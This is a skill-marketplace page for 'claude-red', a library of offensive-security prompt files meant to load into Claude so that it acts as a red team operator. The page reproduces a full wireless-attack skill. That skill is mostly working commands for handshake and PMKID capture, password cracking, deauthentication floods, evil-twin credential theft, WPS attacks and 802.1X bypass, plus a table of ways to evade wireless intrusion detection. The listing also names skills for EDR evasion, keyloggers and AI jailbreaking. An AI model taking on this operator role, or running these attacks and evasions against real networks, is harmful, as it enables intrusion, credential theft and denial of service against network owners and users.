复制安装命令
用 Codex 或 Claude 安装复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它先审查 Skill 页面再帮你安装。
复制前请先查看来源、License 和安全提示。
Offensive security skills for Claude — drop-in SKILL.
用 Codex 或 Claude 安装复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它先审查 Skill 页面再帮你安装。
复制前请先查看来源、License 和安全提示。
来源文件:README.md

Offensive security skills for Claude — drop-in SKILL.md files that turn Claude into a context-aware red team operator.
Built by SnailSploit — GenAI Security Research.
claude-red is a curated library of offensive security skills for the Claude Skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to ADCS abuse.
Drop a skill into your Claude environment and it behaves like a specialist: it knows the techniques, the tooling, the edge cases, and the escalation paths. Skills load on demand based on conversational triggers — you don't pay context for skills you aren't using.
Use it for: authorized red team engagements, bug bounty triage, security research, CTF preparation, training operators, and exploring attack surfaces methodically.
# Clone into a directory Claude will scan
git clone https://github.com/SnailSploit/claude-red ~/.claude/skills/claude-red
# Or install only one category
git clone --filter=blob:none --sparse https://github.com/SnailSploit/claude-red
cd claude-red && git sparse-checkout set Skills/web Skills/active-directory
Claude will auto-load matching skills based on conversational triggers (e.g. mentioning SQLi loads offensive-sqli).
# Point Claude at a single skill before a session
cat Skills/web/offensive-sqli/SKILL.md | claude --system-file -
# Or load a whole category
cat Skills/active-directory/**/SKILL.md | claude --system-file -
Paste the contents of a SKILL.md into a Project's system prompt or prepend to your conversation.
./install.sh # interactive
./install.sh --target ~/.claude/skills # explicit target
./install.sh --category web # one category
| Category | Skills | Focus |
|---|---|---|
| Web Application | 16 | OWASP Top 10 + business logic + advanced web bug classes |
| Auth & Identity | 2 | JWT, OAuth |
| Active Directory | 1 | On-prem AD attack methodology (expanding) |
| Wireless | 13 | 802.11, WPA2/3, EAP, WPS, evil-twin, BLE, Zigbee, Z-Wave, LoRa, sub-GHz |
| Cloud | 1 | AWS / Azure / GCP attack paths (expanding) |
| Mobile | 1 | Android + iOS pentest (expanding) |
| IoT & Embedded | 1 | Hardware, firmware, RTOS, ICS (expanding) |
| Infrastructure & Red Team | 7 | Initial access, EDR evasion, Windows ops |
| Exploit Development | 6 | Stack/heap, mitigations, crash analysis, TOCTOU |
| Fuzzing & VR | 4 | libFuzzer, AFL++, bug ID, vuln classes |
| Reconnaissance | 2 | OSINT tooling and methodology |
| AI Security | 1 | Prompt injection, jailbreaks, RAG poisoning |
| Utility | 2 | Fast-checking, professional reporting |
Skills/web/
| Skill | Description |
|---|---|
offensive-sqli | SQL injection — error/blind/OOB, DB-specific, ORM CVEs, cloud paths |
offensive-xss | Cross-site scripting — stored, reflected, DOM, mutation |
offensive-ssrf | Server-side request forgery — cloud metadata, filter bypass |
offensive-ssti | Server-side template injection — engine ID, RCE paths |
offensive-xxe | XML external entity — OOB exfil, blind exploitation |
offensive-idor | Insecure direct object references — enumeration, business logic |
offensive-file-upload | File upload — extension bypass, polyglots, webshells |
offensive-rce | Remote code execution — chaining, command injection |
offensive-deserialization | Insecure deserialization — Java/PHP/.NET gadget chains |
offensive-race-condition | Race conditions — TOCTOU, single-packet, limit bypass |
offensive-request-smuggling | HTTP request smuggling — CL.TE, TE.CL, h2 desync |
offensive-open-redirect | Open redirect — OAuth abuse, phishing, SSRF pivots |
offensive-parameter-pollution | HTTP parameter pollution — WAF bypass, logic confusion |
offensive-graphql | GraphQL — introspection, batching, IDOR via aliases |
offensive-waf-bypass | WAF bypass — encoding, chunking, case mutation |
offensive-business-logic | Business logic — workflow bypass, pricing, refunds, chains |
Skills/auth/
| Skill | Description |
|---|---|
offensive-jwt | JWT — alg:none, key confusion, secret cracking |
offensive-oauth | OAuth — open redirect abuse, token leakage, PKCE bypass |
Skills/active-directory/
| Skill | Description |
|---|---|
offensive-active-directory | AD — Kerberoast, ASREProast, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD |
Note: This category is being expanded. The AD overview is being split into 16 focused skills (Kerberoasting, ASREProasting, ADCS, coercion, NTLM relay, BloodHound, ticket forgery, GPO abuse, etc.). See Roadmap.
Skills/wireless/
| Skill | Description |
|---|---|
offensive-wifi | 802.11 overview — entrypoint into the wireless category |
offensive-wifi-recon | Adapter selection, monitor mode, multi-band airspace mapping |
offensive-wpa2-psk | Handshake capture, PMKID, hashcat 22000 cracking |
offensive-wpa3-sae | Transition-mode downgrade, Dragonblood, SAE side-channels |
offensive-wpa-enterprise | 802.1X / EAP attacks, eaphammer evil-twin RADIUS |
offensive-wps | Pixie Dust, online PIN brute, vendor PIN generators |
offensive-evil-twin | KARMA, Mana, captive portal, post-association MITM |
offensive-krack-fragattacks | KRACK + FragAttacks supplicant testing |
offensive-deauth-disassoc | Targeted/broadcast deauth, PMF awareness, action frames |
offensive-bluetooth-ble | BLE GATT enum, pairing downgrade, sniffing, MITM |
offensive-bluetooth-classic | BR/EDR — SDP, SPP, KNOB, BlueBorne, HID spoofing |
offensive-zigbee-thread-matter | 802.15.4 mesh — KillerBee, Touchlink abuse, ZCL command injection |
offensive-z-wave | S0 key derivation flaw, S2 commissioning, hub pivots |
offensive-lorawan-sub-ghz | LoRaWAN ABP/OTAA, KeeLoq garage doors, fixed-code, TPMS |
Skills/cloud/
| Skill | Description |
|---|---|
offensive-cloud | AWS / Azure / GCP — privesc, IMDS, cross-account, persistence, CSPM evasion |
Note: Cloud-identity (Entra/AAD/Okta hybrid) skills coming separately. See Roadmap.
Skills/mobile/
| Skill | Description |
|---|---|
offensive-mobile | Android + iOS — Frida, pinning, storage, biometric, deep links |
Skills/iot/
| Skill | Description |
|---|---|
offensive-iot | Hardware recon, firmware, RTOS, ICS/OT, MQTT/CoAP |
Note: Being split into 10 focused skills (UART/JTAG, flash dump, fault injection, U-Boot, secure boot, RTOS, ICS protocols). See Roadmap.
Skills/infrastructure/
| Skill | Description |
|---|---|
offensive-initial-access | Phishing, drive-by, supply chain — TA0001 |
offensive-advanced-redteam | Full kill chain, C2, OPSEC, lateral, persistence |
offensive-edr-evasion | Unhooking, indirect syscalls, PPID spoofing |
offensive-shellcode | Writing, encoding, injection techniques |
offensive-keylogger-arch | Keylogger architecture and input-capture techniques |
offensive-windows-mitigations | Windows mitigations — ACG, Arbitrary Code Guard |
offensive-windows-boundaries | Defeating Windows boundaries — sandbox escape, privilege |
Skills/exploit-dev/
| Skill | Description |
|---|---|
offensive-exploit-development | Stack/heap, ROP chains, mitigations |
offensive-exploit-dev-course | Structured curriculum format |
offensive-basic-exploitation | Linux exploitation, mitigations disabled — beginner-to-mid |
offensive-crash-analysis | Crash triage, exploitability assessment, root cause |
offensive-mitigations | Modern kernel mitigations — ASLR, CFG, CET, PAC |
offensive-toctou | Time-of-check/use across binary, kernel, web, container |
Skills/fuzzing/
| Skill | Description |
|---|---|
offensive-fuzzing | libFuzzer, AFL++, coverage-guided, mutation strategies |
offensive-fuzzing-course | Curriculum — finding vulns via fuzzing |
offensive-bug-identification | Code review patterns, static analysis triggers |
offensive-vuln-classes | Vulnerability classes — real-world examples, taxonomy |
Skills/recon/
| Skill | Description |
|---|---|
offensive-osint | OSINT tools — recon-ng, theHarvester, Maltego pipelines |
offensive-osint-methodology | OSINT methodology — structured intelligence collection |
Skills/ai/
| Skill | Description |
|---|---|
offensive-ai-security | AI pentest — prompt injection, jailbreaking, RAG poisoning |
Skills/utility/
| Skill | Description |
|---|---|
offensive-fast-checking | Fast triage checklist — quick-win identification |
offensive-reporting | Pro pentest reporting — CVSS, evidence, exec summary, retest |
The library is being expanded in seven phases. Track progress in CHANGELOG.md.
| Phase | Category | New Skills | Status |
|---|---|---|---|
| 1 | Internal AD/Windows (rename active-directory/ → internal/) | +16 | Planned |
| 2 | Cloud Identity (Entra/AAD, ADFS, Okta, M365) | +10 | Planned |
| 3 | Wireless split (WPA2/3, EAP, BLE, Zigbee, Z-Wave, LoRa, sub-GHz) | +12 | Mandatory |
| 4 | IoT split (UART/JTAG, flash, fault injection, RTOS, ICS) | +10 | Planned |
| 5 | Web Basics (recon, auth bypass, access control, CSRF, headers, CORS, cache, clickjack) | +8 | Planned |
| 6 | Web Advanced (proto pollution, SAML, OIDC, WebSocket, gRPC, postMessage, SSI/ESI, CSTI) | +10 | Planned |
| 7 | Polish (README, LICENSE, manifest, install) | — | In progress |
End state: ~107 skills across the same 13+ categories.
Contributions welcome. See CONTRIBUTING.md for the skill template, frontmatter standard, and review process. Focused, single-surface skills are preferred over monolithic overviews.
MIT — use freely, attribution appreciated.
"Give Claude the right skill and it stops being a chatbot. It becomes an operator."
This project's full writeup, methodology, and related research lives at:
https://snailsploit.com/claude-red
Created by Kai Aizen — independent offensive security researcher.
snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter
Same attack. Different substrate.
name: offensive-wifi
description: "Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC randomization defeat, BLE/Zigbee/IEEE 802.15.4 sidebands, and Wi-Fi 6/6E/7 considerations. Use when scoping wireless pentest, war-driving an estate, or testing corporate wireless segmentation."| Chipset | Strengths | Notes |
|---|---|---|
| Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 802.11n only |
| Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Driver: aircrack-ng/rtl8812au |
| MediaTek MT7612U (AWUS036ACM) | Stable dual-band | Modern kernels in-tree |
| MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required |
| AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge — verify per release |
# Verify monitor + injection
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo aireplay-ng --test wlan0mon
iw list | grep -A 8 "Supported interface modes"
# Multi-channel discovery (all bands)
sudo airodump-ng wlan0mon --band abg
# Targeted on a known channel/BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
# Hidden SSID — wait for client probe or force deauth
sudo airodump-ng -c 6 --essid-regex "." wlan0mon
# Wigle / Kismet for war-driving
kismet -c wlan0mon
Key data to record: BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.
# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# Force a reconnect (deauth one client, do not blanket the AP)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
Verify the EAPOL frames are usable:
hcxpcapngtool -o hash.hc22000 handshake-01.cap
PMKID lives in the first AP-to-station message — you can grab it without anyone connected.
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
--enable_status=1 --filterlist_ap=targets.txt --filtermode=2
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# GPU dictionary attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule
# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators)
upc_keys ESSID | hashcat -m 22000 hash.hc22000 -
If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.
Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks.
# Reference implementation
git clone https://github.com/vanhoefm/dragonblood
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Triggers heavy crypto on AP CPU; can DoS lower-end deployments
# Watch initial EAP-Request/Identity to fingerprint method
tshark -i wlan0mon -Y "eapol || eap" -V
| Inner Method | Attack |
|---|---|
| EAP-MSCHAPv2 (PEAP/TTLS) | Crack NetNTLMv1-style challenge offline |
| EAP-GTC | Cleartext password — capture via rogue RADIUS |
| EAP-TLS | Steal client cert (often in user keychain / DPAPI / NDES) |
| EAP-PWD | Dragonblood-class side channels |
# eaphammer — automated rogue AP + RADIUS
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
--auth wpa-eap --creds
# Captured hashes → asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt
Critical: organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with ServerValidation disabled (common for BYOD) will hand over creds.
%APPDATA%\Microsoft\SystemCertificates)# Capture WPS exchange
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures — slow and noisy
# wifiphisher — automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd
# airgeddon — interactive menu (good for one-off engagements)
sudo airgeddon
Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.
# hostapd-mana
sudo hostapd-mana ./mana.conf
# Combine with rogue RADIUS for enterprise nets
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
--auth wpa-eap --creds --hostile-portal
iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.
| Attack | Class | Target |
|---|---|---|
| KRACK (CVE-2017-13077..082) | Key reinstallation | Unpatched WPA2 supplicants |
| FragAttacks (CVE-2020-24586..588) | Fragmentation/aggregation | Most pre-2021 implementations |
Test a network's patch status:
# Vanhoef test scripts
git clone https://github.com/vanhoefm/krackattacks-scripts
./krack-test-client.py
git clone https://github.com/vanhoefm/fragattacks
./test-fragattacks.py wlan0
# Single client deauth (use for handshake capture)
aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon
# Broadcast (DoS — only with explicit authorization)
mdk4 wlan0mon d -B target_bssids.txt
# Disassoc + auth flood combo (kicks then prevents reconnect)
mdk4 wlan0mon a -a AP_BSSID -m
802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via Action frames.
# Sniff valid 802.1X exchange on wired side
tcpdump -i eth0 -w nac.pcap ether proto 0x888e
# silentbridge / nac_bypass — transparently bridge through an authenticated host
git clone https://github.com/s0lst1c3/silentbridge
silentbridge --takeover --phy wlan0 # variants for wired
| Tech | Tool | Notes |
|---|---|---|
| Bluetooth Classic | redfang, crackle, btproxy | LMP/L2CAP fuzzing |
| BLE | bettercap, Sniffle (TI CC1352), Frontline | GATT enumeration, LE Secure Connections downgrade |
| Zigbee / 802.15.4 | KillerBee, apimote, ATUSB | Touchlink commissioning abuse |
| Z-Wave | Z-Force, EZ-Wave | S0 key reuse bug class |
| LoRa / LoRaWAN | LoRaPWN, ChirpStack | Join-request replay, ABP key reuse |
| 433/868 MHz (Sub-GHz) | HackRF / Flipper Zero | Garage doors, doorbells, telemetry |
# If you crack a domain user via PEAP-MSCHAPv2, pivot to AD
nxc smb dc -u captured_user -p cracked_pass --pass-pol
# If RADIUS server is stand-alone (FreeRADIUS), check users file & MOTP secrets
# If on Windows NPS, pivot via the service account context
# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0
sudo iw reg set US
# 2. Recon (do not deauth yet)
sudo airodump-ng wlan0mon --band abg --write recon
# 3. PMKID sweep (passive)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
# 4. Targeted capture if PMKID empty
sudo airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon &
sudo aireplay-ng --deauth 3 -a <AP> -c <client> wlan0mon
# 5. Crack offline
hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule
# 6. If enterprise → eaphammer evil twin
# 7. Document SSID, BSSID, channel, RSSI, encryption, attack used, time
| AP/WIDS Detector | Trigger | Evasion |
|---|---|---|
| Excessive deauth | >5 deauth/sec from one source MAC | Spread across spoofed MACs, target individuals |
| Rogue AP detection | Unauthorized BSSID on monitored channel | Match real BSSID's beacon timing/IE order exactly |
| Karma response anomaly | AP answering all probe SSIDs | Use Mana mode, pick one plausible SSID |
| WPS lockout | Repeated PIN failures | Pixie Dust offline only, abandon online brute |
| RADIUS log: cert mismatch | Supplicant rejects evil-twin cert | Use copies of victim CA-signed certs (unlikely) |
评论 (0)
暂无评论,成为第一个评论者吧!